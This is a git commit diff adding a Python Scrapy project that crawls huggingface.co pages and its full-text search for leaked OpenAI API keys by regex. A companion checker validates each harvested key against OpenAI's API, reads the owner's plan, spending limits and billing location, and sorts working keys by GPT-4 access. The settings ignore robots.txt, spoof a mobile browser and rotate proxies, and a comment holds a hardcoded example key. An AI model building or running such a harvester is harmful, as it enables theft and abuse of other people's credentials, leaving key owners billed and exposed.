add files

2023-07-23 18:11:48 -06:00 · 2023-07-23 18:11:48 -06:00 · 15759586e4
parent 2bfc6bb538
commit 15759586e4
17 changed files with 627 additions and 1 deletions
--- a/.gitignore
+++ b/.gitignore
@ -1,3 +1,5 @@
+.idea
+
 # ---> Python
 # Byte-compiled / optimized / DLL files
 __pycache__/
@ -159,4 +161,3 @@ cython_debug/
 #  and can be added to the global gitignore or merged into this file.  For a more nuclear
 #  option (not recommended) you can uncomment the following to ignore the entire idea folder.
 #.idea/
-
--- a/huggingface/init.py
+++ b/huggingface/init.py
--- a/huggingface/check-keys.py
+++ b/huggingface/check-keys.py
@ -0,0 +1,75 @@
+import argparse
+import concurrent
+from concurrent.futures import ThreadPoolExecutor
+from pathlib import Path
+
+from keychecker.check import check_key
+
+
+def process_key(key):
+    result = check_key(key)
+    if not len(result['errors']):
+        if result['has_gpt_4'] or result['has_only_turbo'] or result['has_gpt_4_32k']:
+            print(result)
+        return result
+    return None
+
+
+def main():
+    parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
+    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    args = parser.parse_args()
+
+    input_file = Path(args.input_file).resolve().absolute()
+
+    if not input_file.exists():
+        print('Input file does not exist:', input_file)
+        quit(1)
+
+    with open(input_file) as f:
+        content = set(f.read().splitlines())
+
+    # content = ['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']
+
+    gpt_4 = set()
+    gpt_4_32k = set()
+    gpt_3 = set()
+
+    with ThreadPoolExecutor(max_workers=50) as executor:
+        results = executor.map(process_key, content)
+        for result in results:
+            if result is not None:
+                if result['has_gpt_4']:
+                    gpt_4.add(result['api_key'])
+                if result['has_gpt_4_32k']:
+                    gpt_4_32k.add(result['api_key'])
+                if result['has_only_turbo']:
+                    gpt_3.add(result['api_key'])
+    print('')
+
+    print('GPT4 KEYS:')
+    if not len(gpt_4):
+        print('none')
+    else:
+        for key in gpt_4:
+            print(key)
+    print('')
+
+    print('GPT4-32k KEYS:')
+    if not len(gpt_4_32k):
+        print('none')
+    else:
+        for key in gpt_4_32k:
+            print(key)
+    print('')
+
+    print('GPT3 KEYS:')
+    if not len(gpt_3):
+        print('none')
+    else:
+        for key in gpt_3:
+            print(key)
+
+
+if __name__ == "__main__":
+    main()
--- a/huggingface/crawl-search.py
+++ b/huggingface/crawl-search.py
@ -0,0 +1,11 @@
+import coloredlogs
+from scrapy.crawler import CrawlerProcess
+from scrapy.utils.project import get_project_settings
+
+from huggingface.spiders.search import HFSearchSpider
+
+if __name__ == "__main__":
+    process = CrawlerProcess(get_project_settings())
+
+    process.crawl(HFSearchSpider)
+    process.start()
--- a/huggingface/crawl-site.py
+++ b/huggingface/crawl-site.py
@ -0,0 +1,10 @@
+from scrapy.crawler import CrawlerProcess
+from scrapy.utils.project import get_project_settings
+
+from huggingface.spiders.huggingface import HuggingfaceSpider
+
+if __name__ == "__main__":
+    process = CrawlerProcess(get_project_settings())
+
+    process.crawl(HuggingfaceSpider)
+    process.start()
--- a/huggingface/huggingface/init.py
+++ b/huggingface/huggingface/init.py
--- a/huggingface/huggingface/items.py
+++ b/huggingface/huggingface/items.py
@ -0,0 +1,12 @@
+# Define here the models for your scraped items
+#
+# See documentation in:
+# https://docs.scrapy.org/en/latest/topics/items.html
+
+import scrapy
+
+
+class HuggingfaceItem(scrapy.Item):
+    # define the fields for your item here like:
+    # name = scrapy.Field()
+    pass
--- a/huggingface/huggingface/middlewares.py
+++ b/huggingface/huggingface/middlewares.py
@ -0,0 +1,128 @@
+# Define here the models for your spider middleware
+#
+# See documentation in:
+# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+
+
+# useful for handling different item types with a single interface
+
+
+class HuggingfaceSpiderMiddleware:
+    # Not all methods need to be defined. If a method is not defined,
+    # scrapy acts as if the spider middleware does not modify the
+    # passed objects.
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        # This method is used by Scrapy to create your spiders.
+        s = cls()
+        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
+        return s
+
+    def process_spider_input(self, response, spider):
+        # Called for each response that goes through the spider
+        # middleware and into the spider.
+
+        # Should return None or raise an exception.
+        return None
+
+    def process_spider_output(self, response, result, spider):
+        # Called with the results returned from the Spider, after
+        # it has processed the response.
+
+        # Must return an iterable of Request, or item objects.
+        for i in result:
+            yield i
+
+    def process_spider_exception(self, response, exception, spider):
+        # Called when a spider or process_spider_input() method
+        # (from other spider middleware) raises an exception.
+
+        # Should return either None or an iterable of Request or item objects.
+        pass
+
+    def process_start_requests(self, start_requests, spider):
+        # Called with the start requests of the spider, and works
+        # similarly to the process_spider_output() method, except
+        # that it doesn’t have a response associated.
+
+        # Must return only requests (not items).
+        for r in start_requests:
+            yield r
+
+    def spider_opened(self, spider):
+        spider.logger.info("Spider opened: %s" % spider.name)
+
+
+class HuggingfaceDownloaderMiddleware:
+    # Not all methods need to be defined. If a method is not defined,
+    # scrapy acts as if the downloader middleware does not modify the
+    # passed objects.
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        # This method is used by Scrapy to create your spiders.
+        s = cls()
+        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
+        return s
+
+    def process_request(self, request, spider):
+        # Called for each request that goes through the downloader
+        # middleware.
+
+        # Must either:
+        # - return None: continue processing this request
+        # - or return a Response object
+        # - or return a Request object
+        # - or raise IgnoreRequest: process_exception() methods of
+        #   installed downloader middleware will be called
+        return None
+
+    def process_response(self, request, response, spider):
+        # Called with the response returned from the downloader.
+
+        # Must either;
+        # - return a Response object
+        # - return a Request object
+        # - or raise IgnoreRequest
+        return response
+
+    def process_exception(self, request, exception, spider):
+        # Called when a download handler or a process_request()
+        # (from other downloader middleware) raises an exception.
+
+        # Must either:
+        # - return None: continue processing this exception
+        # - return a Response object: stops process_exception() chain
+        # - return a Request object: stops process_exception() chain
+        pass
+
+    def spider_opened(self, spider):
+        spider.logger.info("Spider opened: %s" % spider.name)
+
+
+from itertools import cycle
+
+from scrapy import signals
+from scrapy.exceptions import NotConfigured
+
+
+class RoundRobinProxyMiddleware:
+    def __init__(self, proxies):
+        if not proxies:
+            raise NotConfigured
+        self.proxies = cycle(proxies)
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        proxies = crawler.settings.getlist('PROXIES')
+        if not proxies:
+            raise NotConfigured
+        return cls(proxies)
+
+    def process_request(self, request, spider):
+        request.meta['proxy'] = next(self.proxies)
+
+    def process_exception(self, request, exception, spider):
+        request.meta['proxy'] = next(self.proxies)
+        return request
--- a/huggingface/huggingface/pipelines.py
+++ b/huggingface/huggingface/pipelines.py
@ -0,0 +1,35 @@
+from scrapy import Field, Item
+
+
+# Define your item pipelines here
+#
+# Don't forget to add your pipeline to the ITEM_PIPELINES setting
+# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
+
+
+# useful for handling different item types with a single interface
+
+
+class HuggingfacePipeline:
+    def process_item(self, item, spider):
+        return item
+
+
+class FoundItem(Item):
+    url = Field()
+    matches = Field()
+
+
+class FilePipeline:
+    def open_spider(self, spider):
+        self.file = open(spider.filename or 'items.txt', 'w')
+
+    def close_spider(self, spider):
+        self.file.close()
+
+    def process_item(self, item, spider):
+        # line = f"URL: {item['url']}, Matches: {item['matches']}\n"
+        for m in item['matches']:
+            self.file.write(m + '\n')
+        self.file.flush()  # Ensure the data is written to the disk immediately
+        return item
--- a/huggingface/huggingface/settings.py
+++ b/huggingface/huggingface/settings.py
@ -0,0 +1,103 @@
+# Scrapy settings for huggingface project
+#
+# For simplicity, this file contains only settings considered important or
+# commonly used. You can find more settings consulting the documentation:
+#
+#     https://docs.scrapy.org/en/latest/topics/settings.html
+#     https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
+#     https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+
+BOT_NAME = "huggingface"
+
+SPIDER_MODULES = ["huggingface.spiders"]
+NEWSPIDER_MODULE = "huggingface.spiders"
+
+# Crawl responsibly by identifying yourself (and your website) on the user-agent
+USER_AGENT = "'Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1'"
+
+# Obey robots.txt rules
+ROBOTSTXT_OBEY = False
+
+# Configure maximum concurrent requests performed by Scrapy (default: 16)
+CONCURRENT_REQUESTS = 100
+
+# Configure a delay for requests for the same website (default: 0)
+# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
+# See also autothrottle settings and docs
+DOWNLOAD_DELAY = 0
+# The download delay setting will honor only one of:
+# CONCURRENT_REQUESTS_PER_DOMAIN = 16
+# CONCURRENT_REQUESTS_PER_IP = 16
+
+# Disable cookies (enabled by default)
+COOKIES_ENABLED = False
+
+# Disable Telnet Console (enabled by default)
+# TELNETCONSOLE_ENABLED = False
+
+# Override the default request headers:
+# DEFAULT_REQUEST_HEADERS = {
+#    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+#    "Accept-Language": "en",
+# }
+
+# Enable or disable spider middlewares
+# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+# SPIDER_MIDDLEWARES = {
+#    "huggingface.middlewares.HuggingfaceSpiderMiddleware": 543,
+# }
+
+# Enable or disable downloader middlewares
+# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
+DOWNLOADER_MIDDLEWARES = {
+    "huggingface.middlewares.RoundRobinProxyMiddleware": 100,
+}
+
+# Enable or disable extensions
+# See https://docs.scrapy.org/en/latest/topics/extensions.html
+# EXTENSIONS = {
+#    "scrapy.extensions.telnet.TelnetConsole": None,
+# }
+
+# Configure item pipelines
+# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
+ITEM_PIPELINES = {
+    "huggingface.pipelines.FilePipeline": 300,
+}
+
+# Enable and configure the AutoThrottle extension (disabled by default)
+# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
+# AUTOTHROTTLE_ENABLED = True
+# The initial download delay
+# AUTOTHROTTLE_START_DELAY = 5
+# The maximum download delay to be set in case of high latencies
+# AUTOTHROTTLE_MAX_DELAY = 60
+# The average number of requests Scrapy should be sending in parallel to
+# each remote server
+# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
+# Enable showing throttling stats for every response received:
+# AUTOTHROTTLE_DEBUG = False
+
+# Enable and configure HTTP caching (disabled by default)
+# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
+# HTTPCACHE_ENABLED = True
+# HTTPCACHE_EXPIRATION_SECS = 0
+# HTTPCACHE_DIR = "httpcache"
+# HTTPCACHE_IGNORE_HTTP_CODES = []
+# HTTPCACHE_STORAGE = "scrapy.extensions.httpcache.FilesystemCacheStorage"
+
+# Set settings whose default value is deprecated to a future-proof value
+REQUEST_FINGERPRINTER_IMPLEMENTATION = "2.7"
+TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
+FEED_EXPORT_ENCODING = "utf-8"
+
+PROXIES = [
+    "http://172.0.4.7:3128",
+    "http://172.0.4.8:3128",
+    "http://172.0.4.10:3128",
+    "http://172.0.4.12:3128",
+]
+
+LOG_LEVEL = 'CRITICAL'
+
+HTTPCACHE_ENABLED = True
--- a/huggingface/huggingface/spiders/init.py
+++ b/huggingface/huggingface/spiders/init.py
@ -0,0 +1,4 @@
+# This package will contain the spiders of your Scrapy project
+#
+# Please refer to the documentation for information on how to create and manage
+# your spiders.
--- a/huggingface/huggingface/spiders/huggingface.py
+++ b/huggingface/huggingface/spiders/huggingface.py
@ -0,0 +1,35 @@
+import logging
+import re
+import time
+
+import coloredlogs
+from scrapy.linkextractors import LinkExtractor
+from scrapy.spiders import CrawlSpider, Rule
+
+from ..pipelines import FoundItem
+
+
+class HuggingfaceSpider(CrawlSpider):
+    name = "huggingface"
+    allowed_domains = ["huggingface.co"]
+    start_urls = ["https://huggingface.co/"]
+    logger = logging.getLogger('HFSearchSpider')
+    logger.setLevel(logging.DEBUG)
+    coloredlogs.install(logger=logger, level=logging.DEBUG)
+
+    rules = (
+        Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_start_url', follow=True),
+    )
+
+    def __init__(self, *args, **kwargs):
+        super(HuggingfaceSpider, self).__init__(*args, **kwargs)
+        self.regex = re.compile(r'sk-[a-zA-Z0-9]{47}')
+        self.filename = f'found-keys-site-{int(time.time())}.txt'
+
+    def parse_start_url(self, response):
+        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
+        text = response.text
+        matches = self.regex.findall(text)
+        if matches:
+            self.logger.error(f"{matches}")
+            return FoundItem(url=response.url, matches=matches)
--- a/huggingface/huggingface/spiders/search.py
+++ b/huggingface/huggingface/spiders/search.py
@ -0,0 +1,31 @@
+import logging
+import re
+import time
+
+import coloredlogs
+import scrapy
+
+from ..pipelines import FoundItem
+
+
+class HFSearchSpider(scrapy.Spider):
+    name = "huggingface_search"
+    allowed_domains = ["huggingface.co"]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    logger = logging.getLogger('HFSearchSpider')
+    logger.setLevel(logging.DEBUG)
+    coloredlogs.install(logger=logger, level=logging.DEBUG)
+
+    def __init__(self, *args, **kwargs):
+        super(HFSearchSpider, self).__init__(*args, **kwargs)
+        self.filename = f'found-keys-{int(time.time())}.txt'
+
+    def parse(self, response):
+        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
+        keys = re.findall(r'(sk-.)</span>([a-zA-Z0-9]{47})', response.text)
+        found_keys = set()
+        for key in keys:
+            found_keys.add(''.join(key))
+        if len(found_keys):
+            self.logger.error(f"{found_keys}")
+            yield FoundItem(url=response.url, matches=found_keys)
--- a/huggingface/keychecker/init.py
+++ b/huggingface/keychecker/init.py
--- a/huggingface/keychecker/check.py
+++ b/huggingface/keychecker/check.py
@ -0,0 +1,165 @@
+# -*- coding: utf-8 -*-
+import logging
+import threading
+import time
+from datetime import datetime
+
+import openai
+import requests
+
+desired_models = ["gpt-3.5-turbo", "gpt-4", "gpt-4-32k"]
+
+
+def list_models(api_key):
+    openai.api_key = api_key
+    models = openai.Model.list()
+    return [model.id for model in models['data']]
+
+
+def filter_models(models):
+    return [model for model in models if model in desired_models]
+
+
+def get_limits(api_key):
+    headers = {
+        "authorization": f"Bearer {api_key}",
+        "Referer": "https://platform.openai.com/account/usage",
+    }
+    response = requests.get("https://api.openai.com/dashboard/billing/subscription", headers=headers)
+
+    if response.status_code == 200:
+        return True, response.json()
+    else:
+        return False, response.text
+
+
+key_test_lock = threading.Lock()
+
+
+def try_complete(api_key):
+    with key_test_lock:
+        openai.api_key = api_key
+        response = openai.ChatCompletion.create(
+            model="gpt-3.5-turbo",
+            max_tokens=1,
+            messages=[{'role': 'user', 'content': ''}]
+        )
+
+
+# def test_key(api_key):
+#     # with key_test_lock:  # not 100% sure it's thread-safe
+#     openai.api_key = api_key
+#     try:
+#         response = openai.Completion.create(
+#             engine="gpt-3.5-turbo",
+#             prompt='Hello there!',
+#             max_tokens=100
+#         )
+#         print(response.choices[0].text.strip())
+#         return True
+#     except Exception as e:
+#         print(f"An error occurred: {e}")
+#         return False
+
+
+def check_key(api_key, retry_count=3):
+    result = f"{api_key}\n"
+    has_gpt_4_32k = False
+    model_ids = []
+    errors = []
+
+    usage_and_limits_success, usage_and_limits = get_limits(api_key)
+    if not usage_and_limits_success:
+        return {
+            'key': api_key,
+            'has_gpt_4': None,
+            'has_gpt_4_32k': None,
+            'has_only_turbo': None,
+            'org_id': None,
+            'soft_limit_usd': None,
+            'hard_limit_usd': None,
+            'access_until': None,  # .strftime('%Y-%m-%d %H:%M:%S'),
+            'plan': None,
+            'plan_id': None,
+            'address': None,
+            'errors': usage_and_limits
+        }
+
+    if usage_and_limits is None:
+        logging.error(f"Failed to get usage and limits for API key {api_key}")
+        return
+    plan = usage_and_limits.get('plan')
+    if plan is None:
+        plan_title = ''
+        plan_id = ''
+    else:
+        plan_title = plan.get('title', '')
+        plan_id = plan.get('id', '')
+    access_until = datetime.fromtimestamp(usage_and_limits['access_until'])
+    org_id = usage_and_limits.get('account_name', '')
+    billing_address = usage_and_limits.get('billing_address', {})
+    if billing_address is not None:
+        billing_country = billing_address.get('country', '')
+        billing_city = billing_address.get('city', '')
+    else:
+        billing_country = ''
+        billing_city = ''
+    is_canceled = usage_and_limits.get('canceled', False)
+    canceled_at_raw = usage_and_limits.get('canceled_at', '')
+    canceled_at = datetime.fromtimestamp(canceled_at_raw) if canceled_at_raw is not None else None
+
+    models = list_models(api_key)
+    filtered_models = filter_models(models)
+
+    if filtered_models:
+        for model_id in filtered_models:
+            result += f"  - {model_id}\n"
+            model_ids.append(model_id)
+    else:
+        result += "  No desired models available.\n"
+
+    has_gpt_4 = "gpt-4" in model_ids
+    has_gpt_4_32k = "gpt-4-32k" in model_ids
+    has_only_turbo = "gpt-3.5-turbo" in model_ids and not has_gpt_4
+
+    try:
+        for attempts in range(retry_count):
+            try:
+                try_complete(api_key)
+                break
+            except Exception as e:
+                error_message = str(e)
+                if "The server is overloaded or not ready yet" in error_message:
+                    logging.info(f'Error encountered when generating a completion on attempt {attempts + 1}: {error_message}. Retrying...')
+                    time.sleep(5)
+                    continue
+                else:
+                    raise e
+    except Exception as e:
+        error_message = str(e)
+        if "You exceeded your current quota" in error_message and is_canceled:
+            errors.append('You exceeded your current quota')
+        elif "You exceeded your current quota" in error_message and not is_canceled:
+            errors.append('This key has exceeded its current quota')
+        elif "Your account is not active" in error_message:
+            errors.append('Error: Your account is not active, please check your billing details on our website.')
+        else:
+            errors.append(error_message)
+
+    # api_key_works = test_key(api_key)
+
+    return {
+        'api_key': api_key,
+        # 'api_key_works': api_key_works,
+        'has_gpt_4': has_gpt_4,
+        'has_gpt_4_32k': has_gpt_4_32k,
+        'has_only_turbo': has_only_turbo,
+        'org_id': org_id,
+        'soft_limit_usd': usage_and_limits['soft_limit_usd'],
+        'hard_limit_usd': float(usage_and_limits['hard_limit_usd']),
+        'access_until': access_until,  # .strftime('%Y-%m-%d %H:%M:%S'),
+        'plan': plan_title,
+        'plan_id': plan_id,
+        'address': f'{billing_country}, {billing_city}',
+        'errors': errors
+    }
--- a/huggingface/scrapy.cfg
+++ b/huggingface/scrapy.cfg
@ -0,0 +1,11 @@
+# Automatically created by: scrapy startproject
+#
+# For more information about the [deploy] section see:
+# https://scrapyd.readthedocs.io/en/latest/deploy.html
+
+[settings]
+default = huggingface.settings
+
+[deploy]
+#url = http://localhost:6800/
+project = huggingface
--- a/requirements.txt
+++ b/requirements.txt
@ -0,0 +1,5 @@
+beautifulsoup4
+requests
+scrapy
+coloredlogs
+openai